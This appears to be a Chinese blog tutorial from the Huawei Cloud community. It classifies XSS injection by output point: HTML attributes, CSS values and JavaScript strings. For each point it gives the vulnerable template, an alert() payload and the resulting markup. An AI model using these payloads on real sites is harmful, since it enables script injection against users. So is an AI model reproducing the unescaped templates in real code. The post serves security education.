xss输出在HTML、CSS、Javascript代码中

举报
黑色地带(崛起) 发表于 2023/02/16 21:48:21 2023/02/16
【摘要】 xss输出在HTML、CSS、Javascript代码中

xss按输出点分类

4.1、输出在HTML标签中

4.2、输出在CSS代码中

4.3、输出在Javascript代码中

 按输出点分类

4.1、输出在HTML标签中

XSS攻击Payload输出在HTML属性中时,攻击者需要在闭合相应的HTML属性后注入新
属性,或者在闭合标签后直接注入新标签

eg:输入:" onclick="alert(/xxs/)


原型:<input name="user" value="{{ your input }}"/>

输出:<input name="user" value="" onclick="alert(/xss/)"/>


eg:输入:"><script>alert(/xss/)</script>

直接闭合input标签,注入新的script标签

输出:<input name="user" value=""><script>alert(/xss/)</script>"/>


4.2、输出在CSS代码中

XSS攻击Payload输出在CSS代码中时,攻击者需要闭合相应的CSS代码

eg:输入:#000; background-image: url('javascript:alert(/xss/)')

闭合前面的color属性,注入background-image属性


原型:

<style type="text/css">
body {
color: {{ your input }};
}
</style>


输出:

<style type="text/css">
body {
color: #000; background-image: url('javascript:alert(/xss/)');
}
</style>


4.3、输出在Javascript代码中

XSS攻击Payload输出在Javascript代码中时,攻击者需要闭合相应的Javascript代

eg:输入:'+alert(/xss/)+'

闭合前面的单引号,注入攻击代码


原型:

<script>
var name='{{ your input }}';
</script>


输出:

<script>
var name=''+alert(/xss/)+'';
</script>


编辑



【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。